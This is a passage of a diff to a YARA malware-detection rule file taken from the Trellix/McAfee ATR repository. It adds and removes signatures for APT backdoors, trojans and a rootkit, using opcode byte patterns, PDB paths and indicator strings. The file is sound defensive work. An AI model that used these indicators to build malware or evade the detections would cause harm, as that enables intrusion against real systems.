?80????8B??76??81??????????8D????83????8B??83????0F82????????8A??88??40414F75??EB??33??8A??418B??83????0F83????????85??75??80????75??8A????81??????????4184??74??33??8A??418D??????8B??89??83????83????4E74??83????72??8B??89??83????83????83????83????73??85??76??8A??88??40414E75??EB??8A??88??40414E75??33??8A??418B??83????73??33??8B??8A??C1????2B??C1????2B??8A??????????81??????????4188??40478A??88??8A????4088??408A????83????8B??0F84????????8A??88??404183????76??8A??88??404183????76??8A??88??404133??8A??418B??83????72??8B??8B??C1????83????2B??33??8A??C1????2B??4F41C1????4E8A??88??8A????404788??40478A??88??40474E75??EB??83????72??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????8D????66????81??????????C1????2B??83????EB??83????0F82????????8B??8B??83????C1????2B??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????66????81??????????C1????2B??83????3B??74??81??????????83????0F82????????8B??2B??83????0F8C????????8B??89??83????83????83????8B??89??83????83????83????83????73??85??0F86????????8A??88??40474E75??E9????????33??8B??8A??C1????2B??C1????2B??4F41E9????????8B??????2B??3B??89??75??5F5E5D33??5BC31B??5F24??5E5D83????5BC39090909090909090909090909081??????????568B??68????????C7??????????FF??????????83????75??57B9????????33??8D??????66????????????F3AB66AB8D??????5068????????FF??????????83????5F75??6A??68????????FF??????????8B??5E81??????????C390909090909090909090909090568B??E8????????F6????????74??56E8????????83????8B??5EC2????909068????????C7??????????FF??????????85??75??FF??????????C39090909053558B??????5685??5774??8B??????85??74??33??33??33??85??76??8A??????????8A??????????32??80????32??8A????32??33??88????8D????BE????????F7??8D????BF????????8B??33??F7??413B??8B??72??5F5E5D5BC39083????538B??????55565768????????68????????5333??FF??????????8B??85??0F84????????68????????FF??????????8B??B0??88??????88??????8D??????B1??5056C6????????88??????C6????????C6????????C6????????C6????????88??????C6????????C6????????C6????????C6????????FF??????????5753FF??568B??FF??????????85??74??57FF??????????8B??8B??????B9????????8B??68????????50F3A5E8????????83????B8????????5F5E5D5B83????C35F8B??5E5D5B83????C39090538B??????????5657C7??????????8D????BF???????? } condition: - uint16(0)==0x5a4d and filesize <50KB and all of them + uint16(0)==0x5a4d and filesize <400KB and all of them } -rule TRELLIX_ARC_Troy_Malware_Campaign_Pdb : BACKDOOR FILE +rule TRELLIX_ARC_Apt_Blackenergy_Pdb : TROJAN FILE { meta: - description = "Rule to detect the Operation Troy based on the PDB" + description = "Rule to detect the BlackEnergy trojan" author = "Marc Rivero | McAfee ATR Team" - id = "c1fc5b9c-104f-5d07-86ee-5a54d9731f04" - date = "2013-06-23" + id = "55c96b66-a8bf-5390-a75a-f3d2441c2a55" + date = "2013-02-15" modified = "2020-08-14" - reference = "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_operation_troy.yar#L1-L26" + reference = "https://www.kaspersky.com.au/resource-center/threats/blackenergy" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_blackenergy_pdb.yar#L1-L38" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "2ca6b7e9488c1e9f39392e696704ad3f2b82069e35bc8001d620024ebbf2d65a" - logic_hash = "a64b4aa082c45d1753ad30ba2f67df0ef5b7658c3c99e031ef747eb4e6c7bb00" + hash = "4b2efcda5269f4b80dc417a2b01332185f2fafabd8ba7114fa0306baaab5a72d" + logic_hash = "7bb85d03d8f2a4d91554f7fea96e9bbe36b153cfa4a91fd13fb99d41d430c9e9" score = 75 quality = 70 - tags = "BACKDOOR, FILE" + tags = "TROJAN, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/OperationTroy" - actor_type = "Apt" + malware_type = "trojan" + malware_family = "Trojan:W32/BlackEngergy" + actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\SetKey_WinlogOn_Shell_Modify\\BD_Installer\\Release\\BD_Installer.pdb" - $pdb1 = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\Dll\\Concealment_Troy(Dll)\\Release\\Concealment_Troy.pdb" + $s1 = "msiexec.exe /i \"%s\" %s REBOOT=\"ReallySuppress\"" fullword wide + $s2 = "InstallUpdate: CreateProcess failed, Cmdline=%s Error=%d ." fullword wide + $s3 = "Portuguese=Instalando o Tempo de Execu" fullword wide + $s4 = "Initialization: Failed to initialize - Unable to get Upgrade Code." fullword wide + $s5 = "This version of Internet Explorer is not supported. You should upgrade Internet Explorer to version %s and run setup again. Se" wide + $s6 = "Initialization: Failed to open %s file, Make sure the file is not used by another process." fullword wide + $s7 = "o %s e execute a configura" fullword wide + $s8 = "Initialization: Failed to initialize - Unable to get Product Version." fullword wide + $s9 = "f:\\CB\\11X_Security\\Acrobat\\Installers\\BootStrapExe_Small\\Release\\Setup.pdb" fullword ascii + $s10 = "BootStrap.log" fullword wide + $s11 = "ACDownloaderDlg" fullword ascii + $s12 = "Initialization: Failed to initialize Product - msi key not specified." fullword wide + $s13 = "rio atualizar para o Service Pack %s e executar a instala" fullword wide + $s14 = "\\Msi.dll" fullword wide condition: - uint16(0)==0x5a4d and filesize <500KB and any of them + uint16(0)==0x5a4d and filesize <2000KB and all of them } import "pe" @@ -189274,522 +192781,35 @@ rule TRELLIX_ARC_Sfx_Winrar_Plugx : BUILDER FILE condition: uint16(0)==0x5a4d and filesize <500KB and (pe.imphash()=="dbb1eb5c3476069287a73206929932fd" and all of them ) } -rule TRELLIX_ARC_APT_Winnti : BACKDOOR FILE -{ - meta: - description = "Detects Winnti variants" - author = "McAfee ATR Team" - id = "f12b039a-2508-580f-b777-428bbda2c666" - date = "2020-06-04" - modified = "2020-10-14" - reference = "https://attack.mitre.org/software/S0141/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_winnti.yar#L1-L27" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "fd539d345821d9ac9b885811b1f642aa1817ba8501d47bc1de575f5bef2fbf9e" - logic_hash = "f94b2c552fbb30e1005e5c75a2f449d60b9558a0916197bed41bf32c6477daef" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Winnti" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $pattern = { 9090909090909090909090909090C7????????????C2????90909090909081??????????E9????????CCCCCCCCCC8A??????8B??????538A??8A??568B??578B??????8B??C1????66????8B??C1????F3AB8B??83????F3AA8B??5F5E5BC390909090909090909090909090909083????5333??568D??????535089??????89??????E8????????8A??33??3A??8D??????0F94??83????5389??????528B??89??????C6????????E8????????8B??33??81??????????8D??????0F94??6A??89??????5223??89??????C6????????C6????????E8????????33??66????8D??????6A??0F94??89??????89??????5223??C6????????C6????????E8????????8B??83????33??3B??0F94??23??5E495BF7??1B??8B??83????C38B??????8B??????03??C390909090908B??????85??0F84????????8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??E9????????83????C39090909090909090909090909083????8B??????53558B??????33??568B??????83????5789??????76??81??????????8B??76??BF????????8B??????8D????03??C1????03??89??????3B??76??8B??????68????????6A??52E8????????8B??????8B??????8B??????505351565752E8????????8B??????8B??8B??????2B??8B??83????03??8B??????83????89??????77??03??0F84????????8B??????8B??????2B??03??3B??89??????75??81??????????77??8A??04??EB??83????77??08????EB??83????77??8A??80????88??EB??8D????C6????463D????????89??????76??8D????B8????????F7??C1????8B??33??8B??8B??C1????F3AB8B??83????03??F3AA8B??????81??????????4A89??????75??8B??????8B??88??468A??88??46424B75??8B??????C6????465FC6????46C6????2B??8B??????4633??89??5E5D5B83????C390909090909090909083????8B??????53558B??????568B??????8D????5789??????8B??????83????73??B8????????2B??EB??33??03??8B??2B??C1????8D??????89??????8B??????8B??????8D????3B??0F83????????8B??8B??69??????????8B??????8B??????C1????33??66??????03??8B??????2B??????89??????66??????8B??3B??0F85????????8B??????C7??????????????2B??8B??????8B??2B??0F84????????83????77??8A????0A??88????8B????89??03??E9????????83????77??8A??2C??88??468B????89??8B????89????8B????89????8B????89????03??E9????????83????77??8A??80????88??46EB??8D????C6????463D????????89??????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??8B??????81??????????4889??????75??8B??????8B??8B??????88??468B????89??8B????89????8B????89????8B????89????83????83????83????83????73??85??76??8A????88??46454B75??BB????????8B????8B????33??75??BB????????03??8B????8B??33??8B??????83????3B??73??8B??2B??????85??75??83????83????8B????8B??33??8B??????3B??72??EB??84??75??C1????4384??74??8B??????8B??03??2B??83????89??????77??3D????????77??4880????8A??80????C0????C0????0A??88??46C1????88??46E9????????3D????????77??4883????89??????77??80????80????EB??83????C6????4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????2D????????83????89??????77??8B??80????C1????80????8A??0A??80????88??46C0????88??46C1????88??46E9????????8B??83????C1????80????80????88??4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????8B??????E9????????8B??????8B??????8B??????2B??89??8B??5F2B??5E5D03??5B83????C390909090909090909090908B??????538B??????55568B??????C7??????????578A??8D????8B??????80????8B??76??81??????????8D????83????8B??83????0F82????????8A??88??40414F75??EB??33??8A??418B??83????0F83????????85??75??80????75??8A????81??????????4184??74??33??8A??418D??????8B??89??83????83????4E74??83????72??8B??89??83????83????83????83????73??85??76??8A??88??40414E75??EB??8A??88??40414E75??33??8A??418B??83????73??33??8B??8A??C1????2B??C1????2B??8A??????????81??????????4188??40478A??88??8A????4088??408A????83????8B??0F84????????8A??88??404183????76??8A??88??404183????76??8A??88??404133??8A??418B??83????72??8B??8B??C1????83????2B??33??8A??C1????2B??4F41C1????4E8A??88??8A????404788??40478A??88??40474E75??EB??83????72??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????8D????66????81??????????C1????2B??83????EB??83????0F82????????8B??8B??83????C1????2B??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????66????81??????????C1????2B??83????3B??74??81??????????83????0F82????????8B??2B??83????0F8C????????8B??89??83????83????83????8B??89??83????83????83????83????73??85??0F86????????8A??88??40474E75??E9????????33??8B??8A??C1????2B??C1????2B??4F41E9????????8B??????2B??3B??89??75??5F5E5D33??5BC31B??5F24??5E5D83????5BC39090909090909090909090909081??????????568B??68????????C7??????????FF??????????83????75??57B9????????33??8D??????66????????????F3AB66AB8D??????5068????????FF??????????83????5F75??6A??68????????FF??????????8B??5E81??????????C390909090909090909090909090568B??E8????????F6????????74??56E8????????83????8B??5EC2????909068????????C7??????????FF??????????85??75??FF??????????C39090909053558B??????5685??5774??8B??????85??74??33??33??33??85??76??8A??????????8A??????????32??80????32??8A????32??33??88????8D????BE????????F7??8D????BF????????8B??33??F7??413B??8B??72??5F5E5D5BC39083????538B??????55565768????????68????????5333??FF??????????8B??85??0F84????????68????????FF??????????8B??B0??88??????88??????8D??????B1??5056C6????????88??????C6????????C6????????C6????????C6????????88??????C6????????C6????????C6????????C6????????FF??????????5753FF??568B??FF??????????85??74??57FF??????????8B??8B??????B9????????8B??68????????50F3A5E8????????83????B8????????5F5E5D5B83????C35F8B??5E5D5B83????C39090538B??????????5657C7??????????8D????BF???????? } - - condition: - uint16(0)==0x5a4d and filesize <400KB and all of them -} -import "pe" - -rule TRELLIX_ARC_Milum_Trojan : TROJAN FILE +rule TRELLIX_ARC_Apt_Mirage_Pdb : TROJAN FILE { meta: - description = "Rule to detect Milum trojan from the Wildpressure operation" + description = "Rule to detect Mirage samples based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "acc56237-a93a-55c0-a90c-11ca1da683db" - date = "2020-04-24" + id = "49b7623f-a2c9-52e4-8679-d62f6aae99ca" + date = "2012-09-18" modified = "2020-08-14" - reference = "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_milum_wildpressure.yar#L3-L28" + reference = "https://www.secureworks.com/research/the-mirage-campaign" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_mirage_pdb.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9" - logic_hash = "3ab1ff129517cb4a829edac289c00d7701d6f667ba2ef5a28024fd01a3a52e8e" + hash = "0107a12f05bea4040a467dd5bc5bd130fd8a4206a09135d452875da89f121019" + logic_hash = "cb88dc787d9964451ea93f5574d9c73ae6a820d81e20d41c3c8ee44c3fee032d" score = 75 quality = 70 tags = "TROJAN, FILE" rule_version = "v1" malware_type = "trojan" - malware_family = "Trojan:W32/Milum" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $pattern = { 558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????89??????????C7????????????8D????C7??????????33??6A??89??????????89????E8????????83????3B??0F84????????89????89??8B????89????8B????89????8B????C6??????8B????C6??????C6??????8B??????????BE????????89????89????88????C6??????6A??68????????8D??????????89??????????89??????????88??????????E8????????C6??????6A??538D????528D??????????89??????????89??????????88??????????E8????????C6??????8D??????????508B??E8????????508D??????????5157E8????????C6??????83????????????72??8B??????????52E8????????83????89??????????89??????????88??????????C6??????83????????????72??8B??????????50E8????????83????6A??68????????8D????89??????????89??????????88??????????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????83??????72??8B????51E8????????83????89????89????88????C6??????83??????72??8B????52E8????????83????6A??68????????8D????89????89????88????89????89????88????E8????????C6??????6A??538D????508D????89????89????88????E8????????C6??????83????8B??89??????????6A??89????89????68????????88??E8????????C6??????83????8B??89??????????6A??538D????89????89????5288??E8????????C6??????8D??????????50C6??????E8????????83????C6??????8B??????????2B??????????B8????????F7??03??C1????8B??C1????03??83????75??8B??????????6A??53528D????E8????????8B??????????6A??83????53508D????E8????????6A??538D????508D????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????BF????????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????8B??????????3B??74??8B??????????E8????????8B??????????50E8????????83????BF????????89??????????89??????????89??????????C6??????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????39????72??8B????50E8????????83????89????89????88????88????39????72??8B????51E8????????83????89????89????88????C7????????????39????72??8B????52E8????????83????8B??????????89????89????88????8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????8D??????????508D??????????89??????????E8????????C6??????C7??????????????????C6??????68????????8D??????????51E8????????CCCC558B??6A??68????????64??????????5051535657A1????????33??508D????64??????????8B????C7??????????C7????????????8D????33??83??????89????72??8B??EB??8B??8D????88??8B????8B????518B??E8????????8B????89????8B????89??8B????89????89????88????83??????72??8B??50E8????????83????89????C7????????????88??83????89????89????C7????????????8B????8B??50518D????E8????????89????8B????52E8????????83????8B????64????????????595F5E5B8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????505156A1????????33??508D????64??????????83????C7????????????8B????5156E8????????C7????????????C7????????????8B??8B????64????????????595E8B??5DC2????CCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????33??8B??89??????????8B????8B??89??????????89??????????89??????????3B??0F84????????8D????39??????????0F85????????68????????8D????5750E8????????C7????????????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????E9????????578D????68????????51E8????????C7????????????508D??????????52BA????????E8????????C6??????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????C6??????39??????????72??8B??????????50E8????????83????C7??????????????????89??????????88??????????88????39????72??8B????51E8????????83????C7????????????89????88????FF??????????38????75??8B????38????75??8B??8B??38????75??8D????8B??8B??38????74??EB??8B????38????75??3B????75??8B??8B????38????74??8B??8B??????????3B????0F85????????8B??????????8B??6A??5383????C7????????????89????508B??88??E8????????89????C7??????????????????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????C7????????????89????88????8B????64????????????595E5B8B??5DC3CCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????5356508D????64??????????33??89????538B??68????????8D????89????C7????????????89????88????E8????????C7????????????6A??8D????38????74??68????????EB??68????????E8????????8D????5083????8D????5651E8????????C6??????8D????52578B??E8????????83????C7????????????C6??????BE????????39????72??8B????50E8????????83????C7????????????89????88????88????39????72??8B????51E8????????83????C7????????????89????88????8B??8B????64????????????595E5B8B????33??E8????????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????F6??????C7????????????89????88????74??56E8????????83????8B??8B????64????????????595E5B8B??5DC2????CCCC558B??6A??68????????64??????????50A1????????33??508D????64??????????C7????????????6A??6A??8D????5083????E8????????C7????????????83??????72??8B????51E8????????83????C7????????????C7????????????C6??????8B????64????????????598B??5DC2????CCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????535657508D????64??????????33??89????8B????89????89????B8????????89????C7????????????89????88??89????8D????BF????????39????72??8B??8B????39????73??8D????8B????518D????518B??E8????????C6??????508B??E8????????C6??????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B??33??89????8B????89??????????89?????????? } - - condition: - uint16(0)==0x5a4d and filesize <2000KB and pe.imphash()=="548d9f5f1e74f34b85612667335d41f2" and all of them -} -rule TRELLIX_ARC_Karkoff_Dnspionaje : BACKDOOR FILE -{ - meta: - description = "Rule to detect the Karkoff malware" - author = "Marc Rivero | McAfee ATR Team" - id = "a5cdc65f-3a4c-5d97-9d88-8d60b14dfb9a" - date = "2019-04-23" - modified = "2020-08-14" - reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_karkoff_dnspionaje.yar#L1-L30" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c" - logic_hash = "79dd0087f1197cb1b2cd98416302363951479ba5ebf82289768585b56ed21c3a" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Karkoff" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $s1 = "DropperBackdoor.Newtonsoft.Json.dll" fullword wide - $s2 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide - $s3 = "DropperBackdoor.exe" fullword wide - $s4 = "get_ProcessExtensionDataNames" fullword ascii - $s5 = "get_ProcessDictionaryKeys" fullword ascii - $s6 = "https://www.newtonsoft.com/json 0" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize <1000KB and all of them -} -rule TRELLIX_ARC_Apt_Gdocupload_Glooxmail : BACKDOOR FILE -{ - meta: - description = "Rule to detect gdocupload tool used by APT1" - author = "Marc Rivero | McAfee ATR Team" - id = "deb20196-65e6-5dac-af0c-2f16e5926715" - date = "2013-02-19" - modified = "2020-08-14" - reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_gdocupload_pdb.yar#L1-L32" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "295c5c7aa5fa29628dec9f42ed657fce0bc789079c4e51932bcbc99a28dfd440" - logic_hash = "e016bb636af22fae79875bebaf1b4bd4f2a403e797d7ee52ea0691b4d7a54cf8" - score = 75 - quality = 45 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Gdocupload" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "https://www.google.com/accounts/ServiceLogin?service=writely&passive=1209600&continue=http://docs.google.com/&followup=http://do" ascii - $s2 = "Referer: http://sn114w.snt114.mail.live.com/mail/AttachmentUploader.aspx?_ec=1" fullword ascii - $s3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET " ascii - $s4 = "e:\\Project\\mm\\Webmail\\Bin\\gdocs.pdb" fullword ascii - $s5 = "http://docs.google.com/?auth=" fullword ascii - $s6 = "x-guploader-client-info: mechanism=scotty flash; clientVersion=18067216" fullword ascii - $s7 = "http://docs.google.com/" fullword ascii - $s8 = "Referer: http://sn114w.snt114.mail.live.com/mail/EditMessageLight.aspx?n=%s" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize <300KB and all of them -} -rule TRELLIX_ARC_Enfal_Pdb : BACKDOOR FILE -{ - meta: - description = "Rule to detect Enfal malware" - author = "Marc Rivero | McAfee ATR Team" - id = "09b9667c-cf58-5438-958d-19a99fe91e32" - date = "2013-08-27" - modified = "2020-08-14" - reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/enfal" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/enfal_pdb.yar#L1-L29" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "6756808313359cbd7c50cd779f809bc9e2d83c08da90dbd80f5157936673d0bf" - logic_hash = "1f7785a4c54981c3e7cb417718312e0ed82132b9bd9288f7b0f322cbeafbaecd" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Enfal" + malware_family = "Trojan:W32/Mirage" actor_type = "Apt" actor_group = "Unknown" strings: - $pdb = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\DllServiceTrojan.pdb" - $pdb1 = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\ServiceDll.pdb" - $pdb2 = "\\Release\\ServiceDll.pdb" - $pdb3 = "\\muma\\0511\\Release\\ServiceDll.pdb" - $pdb4 = "\\programs\\LuridDownLoader\\LuridDownloader for Falcon\\ServiceDll\\Release\\ServiceDll.pdb" + $pdb = "\\MF-v1.2\\Server\\Debug\\Server.pdb" + $pdb1 = "\\fox_1.2 20110307\\MF-v1.2\\Server\\Release\\MirageFox_Server.pdb" condition: uint16(0)==0x5a4d and filesize <150KB and any of them } -rule TRELLIX_ARC_Chimera_Recordedtv_Modified : TROJAN FILE -{ - meta: - description = "Rule to detect the modified version of RecordedTV.ms found in the Operation Skeleton" - author = "Marc Rivero | McAfee ATR Team" - id = "b0969713-41a4-550c-9545-f02783fa8d02" - date = "2020-04-21" - modified = "2020-08-14" - reference = "https://medium.com/@cycraft_corp/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_operation_skeleton.yar#L1-L33" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "66f13964c87fc6fe093a9d8cc0de0bf2b3bdaea9564210283fdb97a1dde9893b" - logic_hash = "7165779b66999259a079fa68f898c5f9fb634adcb9d249366d321dff1014184b" - score = 75 - quality = 70 - tags = "TROJAN, FILE" - rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/RecordedTV" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $byte = { C0 0E 5B C3 } - $s1 = "Encrypted file: CRC failed in %s (password incorrect ?)" fullword wide - $s2 = "EBorland C++ - Copyright 1999 Inprise Corporation" fullword ascii - $s3 = " MacOS file type: %c%c%c%c ; " fullword wide - $s4 = "rar.lng" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize <900KB and all of them -} -rule TRELLIX_ARC_Apt_Miniasp_Pdb : TROJAN FILE -{ - meta: - description = "Rule to detect MiniASP based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "2e7e2990-5e7f-52b0-884a-fcb54b2f5488" - date = "2012-07-12" - modified = "2020-08-14" - reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_MiniASP_pdb.yar#L1-L26" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "42334f2119069b8c0ececfb14a7030e480b5d18ca1cc35f1ceaee847bc040e53" - logic_hash = "8ee6f93aaae2c48cc5835269fd526371040cd33cc309220f92a150444ba21055" - score = 75 - quality = 70 - tags = "TROJAN, FILE" - rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/MiniASP" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $pdb = "\\Project\\mm\\Wininet\\Attack\\MiniAsp4\\Release\\MiniAsp.pdb" - $pdb1 = "\\XiaoME\\AiH\\20120410\\Attack\\MiniAsp3\\Release\\MiniAsp.pdb" - - condition: - uint16(0)==0x5a4d and filesize <80KB and any of them -} -rule TRELLIX_ARC_Apt_Hikit_Rootkit : ROOTKIT FILE -{ - meta: - description = "Rule to detect the rootkit hikit based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "c53acbc6-8f4a-590b-8dd7-ce4da6d79cf8" - date = "2012-08-20" - modified = "2020-08-14" - reference = "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_hikit_rootkit_pdb.yar#L1-L28" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "8a425ababdfbe95bd8ac7d4f519be16c0f1fd0b7eea2874124db2f00dd6eb56d" - score = 75 - quality = 70 - tags = "ROOTKIT, FILE" - rule_version = "v1" - malware_type = "rootkit" - malware_family = "Rootkit:W32/Hikit" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $pdb = "\\JmVodServer\\hikit\\bin32\\RServer.pdb" - $pdb1 = "\\JmVodServer\\hikit\\bin32\\w7fw.pdb" - $pdb2 = "\\JmVodServer\\hikit\\bin32\\w7fw_2k.pdb" - $pdb3 = "\\JmVodServer\\hikit\\bin64\\w7fw_x64.pdb" - - condition: - uint16(0)==0x5a4d and filesize <100KB and any of them -} -rule TRELLIX_ARC_Apt_Babar_Malware : BACKDOOR FILE -{ - meta: - description = "Rule to detect Babar malware" - author = "Marc Rivero | McAfee ATR Team" - id = "3cbb63ce-ff93-51ee-93aa-2594fa1f8dad" - date = "2015-02-18" - modified = "2020-08-14" - reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_babar_pdb.yar#L1-L35" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "c72a055b677cd9e5e2b2dcbba520425d023d906e6ee609b79c643d9034938ebf" - logic_hash = "02acef92691caed4573b609c111302427b9c27c5ef93f9199c52d75cb13e8615" - score = 75 - quality = 45 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Babar" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = 